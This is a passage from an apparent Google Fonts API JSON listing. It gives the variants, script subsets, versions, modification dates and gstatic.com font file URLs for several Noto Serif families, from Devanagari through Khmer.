\"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTA-ow-HMUe1u_dv.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTAMow-HMUe1u_dv.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTDgpA-HMUe1u_dv.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTDZpA-HMUe1u_dv.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTC-pA-HMUe1u_dv.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifdevanagari/v21/x3dYcl3IZKmUqiMk48ZHXJ5jwU-DZGRSaQ4Hh2dGyFzPLcQPVbnRNeFsw0xRWb6uxTCXpA-HMUe1u_dv.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Display\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVpd49gKaDU9hvzC.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVrd4tgKaDU9hvzC.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVoD4tgKaDU9hvzC.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVpd4tgKaDU9hvzC.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVpv4tgKaDU9hvzC.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVqD5dgKaDU9hvzC.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVq65dgKaDU9hvzC.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVrd5dgKaDU9hvzC.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buERppa9f8_vkXaZLAgP0G5Wi6QmA1QaeYah2sovLCDq_ZgLyt3idQfktOG-PVr05dgKaDU9hvzC.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VoTBIYjEfg-zCmf4.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VobBJYjEfg-zCmf4.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VoW5JYjEfg-zCmf4.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VoTBJYjEfg-zCmf4.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VoQJJYjEfg-zCmf4.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-Voe5OYjEfg-zCmf4.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VoddOYjEfg-zCmf4.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VobBOYjEfg-zCmf4.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/notoserifdisplay/v17/buEPppa9f8_vkXaZLAgP0G5Wi6QmA1QwcLRCOrN8uo7t6FBJOJTQit-N33sQOk-VoZlOYjEfg-zCmf4.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Dogra\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"dogra\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifdogra/v16/MQpP-XquKMC7ROPP3QOOlm7xPu3fGy63IbPzkns.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Ethiopic\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"ethiopic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifethiopic/v22/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCzSQjkaO9UVLyiw.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifethiopic/v22/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCTSUjkaO9UVLyiw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifethiopic/v22/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCkyUjkaO9UVLyiw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifethiopic/v22/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCzSUjkaO9UVLyiw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifethiopic/v22/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxC_yUjkaO9UVLyiw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifethiopic/v22/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCEyIjkaO9UVLyiw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifethiopic/v22/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCKiIjkaO9UVLyiw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifethiopic/v22/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCTSIjkaO9UVLyiw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifethiopic/v22/V8mjoR7-XjwJ8_Au3Ti5tXj5Rd83frpWLK4d-taxqWw2HMWjDxBAg5S_0QsrggxCZCIjkaO9UVLyiw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Georgian\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"georgian\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSTvsfdzTw-FgZxQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSzvofdzTw-FgZxQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSEPofdzTw-FgZxQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSTvofdzTw-FgZxQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSfPofdzTw-FgZxQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSkP0fdzTw-FgZxQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSqf0fdzTw-FgZxQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aSzv0fdzTw-FgZxQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifgeorgian/v18/VEMXRpd8s4nv8hG_qOzL7HOAw4nt0Sl_XxyaEduNMvi7T6Y4etRnmGhyLop-R3aS5_0fdzTw-FgZxQ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Grantha\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"grantha\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifgrantha/v19/qkBIXuEH5NzDDvc3fLDYxPk9-Wq3WLiqFENLR7fHGw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Gujarati\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"gujarati\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2HuYycYzuM1Kf-OJu.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2HuaycIzuM1Kf-OJu.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2HuZscIzuM1Kf-OJu.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2HuYycIzuM1Kf-OJu.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2HuYAcIzuM1Kf-OJu.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2Hubsd4zuM1Kf-OJu.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2HubVd4zuM1Kf-OJu.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2Huayd4zuM1Kf-OJu.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifgujarati/v21/hESa6WBlOixO-3OJ1FTmTsmqlBRUJBVkcgNLpdsspzP2Huabd4zuM1Kf-OJu.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Gurmukhi\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"gurmukhi\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr6-eBTNmqVU7y6l.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr4-eRTNmqVU7y6l.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr7geRTNmqVU7y6l.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr6-eRTNmqVU7y6l.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr6MeRTNmqVU7y6l.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr5gfhTNmqVU7y6l.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr5ZfhTNmqVU7y6l.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr4-fhTNmqVU7y6l.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifgurmukhi/v14/92z-tA9LNqsg7tCYlXdCV1VPnAEeDU0vLoYMbylXk0xTCr4XfhTNmqVU7y6l.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif HK\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"chinese-hongkong\",\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMf-K2RmV9Su1M6i.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMcgK2RmV9Su1M6i.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMd-K2RmV9Su1M6i.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMdMK2RmV9Su1M6i.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMegLGRmV9Su1M6i.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMeZLGRmV9Su1M6i.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMf-LGRmV9Su1M6i.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifhk/v2/BngdUXBETWXI6LwlBZGcqL-B_KuJFcgfwP_9RMfXLGRmV9Su1M6i.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Hebrew\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVAwTAG8_vlQxz24.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVIwSAG8_vlQxz24.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVFISAG8_vlQxz24.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVAwSAG8_vlQxz24.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVD4SAG8_vlQxz24.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVNIVAG8_vlQxz24.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVOsVAG8_vlQxz24.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVIwVAG8_vlQxz24.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifhebrew/v20/k3k0o9MMPvpLmixYH7euCwmkS9DohjX1-kRyiqyBqIxnoLbp93i9IKrXKF_qVKUVAG8_vlQxz24.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif JP\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/notoserifjp/v21/xn77YHs72GKoTvER4Gn3b5eMZBaPRkgfU8fEwb0.otf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifjp/v21/xn77YHs72GKoTvER4Gn3b5eMZHKMRkgfU8fEwb0.otf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifjp/v21/xn7mYHs72GKoTvER4Gn3b5eMXNikYkY0T84.otf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifjp/v21/xn77YHs72GKoTvER4Gn3b5eMZCqNRkgfU8fEwb0.otf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifjp/v21/xn77YHs72GKoTvER4Gn3b5eMZAaKRkgfU8fEwb0.otf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifjp/v21/xn77YHs72GKoTvER4Gn3b5eMZGKLRkgfU8fEwb0.otf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifjp/v21/xn77YHs72GKoTvER4Gn3b5eMZFqJRkgfU8fEwb0.otf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif KR\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/notoserifkr/v20/3JnmSDn90Gmq2mr3blnHaTZXTihC8O1ZNH1ahck.otf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifkr/v20/3JnmSDn90Gmq2mr3blnHaTZXTkxB8O1ZNH1ahck.otf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifkr/v20/3Jn7SDn90Gmq2mr3blnHaTZXduZp1ONyKHQ.otf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifkr/v20/3JnmSDn90Gmq2mr3blnHaTZXThRA8O1ZNH1ahck.otf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifkr/v20/3JnmSDn90Gmq2mr3blnHaTZXTjhH8O1ZNH1ahck.otf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifkr/v20/3JnmSDn90Gmq2mr3blnHaTZXTlxG8O1ZNH1ahck.otf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifkr/v20/3JnmSDn90Gmq2mr3blnHaTZXTmRE8O1ZNH1ahck.otf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Kannada\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"kannada\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgcYCceRJ71svgcI.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgUYDceRJ71svgcI.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgZgDceRJ71svgcI.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgcYDceRJ71svgcI.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgfQDceRJ71svgcI.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgRgEceRJ71svgcI.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgSEEceRJ71svgcI.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgUYEceRJ71svgcI.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifkannada/v21/v6-8GZHLJFKIhClqUYqXDiWqpxQxWSPoW6bz-l4hGHiNgW8EceRJ71svgcI.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif Khmer\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdN6B4wXEZK9Xo4xg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdNaB8wXEZK9Xo4xg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdNth8wXEZK9Xo4xg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdN6B8wXEZK9Xo4xg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdN2h8wXEZK9Xo4xg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdNNhgwXEZK9Xo4xg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdNDxgwXEZK9Xo4xg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdNaBgwXEZK9Xo4xg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notoserifkhmer/v18/-F6UfidqLzI2JPCkXAO2hmogq0146FxtbwKEr951z5s6lI40sDRH_AVhUKdNQRgwXEZK9Xo4xg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Serif 